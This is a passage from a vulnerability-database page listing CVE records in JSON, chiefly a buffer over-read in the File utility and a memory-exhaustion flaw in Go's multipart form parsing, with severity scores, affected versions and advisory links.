"cveId": "CVE-2023-6237", "datePublished": "2024-04-25T06:27:26.990Z", "dateReserved": "2023-11-21T10:16:34.346Z", "dateUpdated": "2024-11-01T14:28:51.338Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-48554
Vulnerability from cvelistv5
Published
2023-08-22 00:00
Modified
2024-08-03 15:17
Severity ?
EPSS score ?
Summary
File before 5.43 has an stack-based buffer over-read in file_copystr in funcs.c. NOTE: "File" is the name of an Open Source project.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T15:17:55.372Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugs.astron.com/view.php?id=310" }, { "name": "DSA-5489", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5489" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231116-0002/" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214081" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214088" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214084" }, { "tags": [ "x_transferred" ], "url": "https://support.apple.com/kb/HT214086" }, { "name": "20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Mar/21" }, { "name": "20240313 APPLE-SA-03-07-2024-6 tvOS 17.4", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Mar/25" }, { "name": "20240313 APPLE-SA-03-07-2024-5 watchOS 10.4", "tags": [ "mailing-list", "x_transferred" ], "url": "http://seclists.org/fulldisclosure/2024/Mar/24" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "File before 5.43 has an stack-based buffer over-read in file_copystr in funcs.c. NOTE: \"File\" is the name of an Open Source project." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-13T22:07:17.737915", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugs.astron.com/view.php?id=310" }, { "name": "DSA-5489", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5489" }, { "url": "https://security.netapp.com/advisory/ntap-20231116-0002/" }, { "url": "https://support.apple.com/kb/HT214081" }, { "url": "https://support.apple.com/kb/HT214088" }, { "url": "https://support.apple.com/kb/HT214084" }, { "url": "https://support.apple.com/kb/HT214086" }, { "name": "20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2024/Mar/21" }, { "name": "20240313 APPLE-SA-03-07-2024-6 tvOS 17.4", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2024/Mar/25" }, { "name": "20240313 APPLE-SA-03-07-2024-5 watchOS 10.4", "tags": [ "mailing-list" ], "url": "http://seclists.org/fulldisclosure/2024/Mar/24" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-48554", "datePublished": "2023-08-22T00:00:00", "dateReserved": "2023-07-23T00:00:00", "dateUpdated": "2024-08-03T15:17:55.372Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45290
Vulnerability from cvelistv5
Published
2024-03-05 22:22
Modified
2024-11-07 11:07
Severity ?
EPSS score ?
Summary
When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion. With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Go standard library | net/textproto |
Version: 0 ≤ Version: 1.22.0-0 ≤ |
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-45290", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T15:04:15.773941Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-770", "description": "CWE-770 Allocation of Resources Without Limits or Throttling", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-07T11:07:13.798Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T20:21:15.331Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/65383" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/569341" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2599" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240329-0004/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "net/textproto", "product": "net/textproto", "programRoutines": [ { "name": "Reader.readLineSlice" }, { "name": "Reader.readContinuedLineSlice" }, { "name": "Reader.ReadCodeLine" }, { "name": "Reader.ReadContinuedLine" }, { "name": "Reader.ReadContinuedLineBytes" }, { "name": "Reader.ReadDotLines" }, { "name": "Reader.ReadLine" }, { "name": "Reader.ReadLineBytes" }, { "name": "Reader.ReadMIMEHeader" }, { "name": "Reader.ReadResponse" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.21.8", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.1", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "Bartek Nowotarski" } ], "descriptions": [ { "lang": "en", "value": "When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion. With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-400: Uncontrolled Resource Consumption", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-05T22:22:28.703Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/65383" }, { "url": "https://go.dev/cl/569341" }, { "url": "https://groups.google.com/g/golang-announce/c/5pwGVUPoMbg" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2599" }, { "url": "https://security.netapp.com/advisory/ntap-20240329-0004/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/03/08/4" } ], "title": "Memory exhaustion in multipart form parsing in net/textproto and net/http" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2023-45290", "datePublished": "2024-03-05T22:22:28.703Z", "dateReserved": "2023-10-06T17:06:26.221Z", "dateUpdated": "2024-11-07T11:07:13.798Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Loading…
Loading…
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.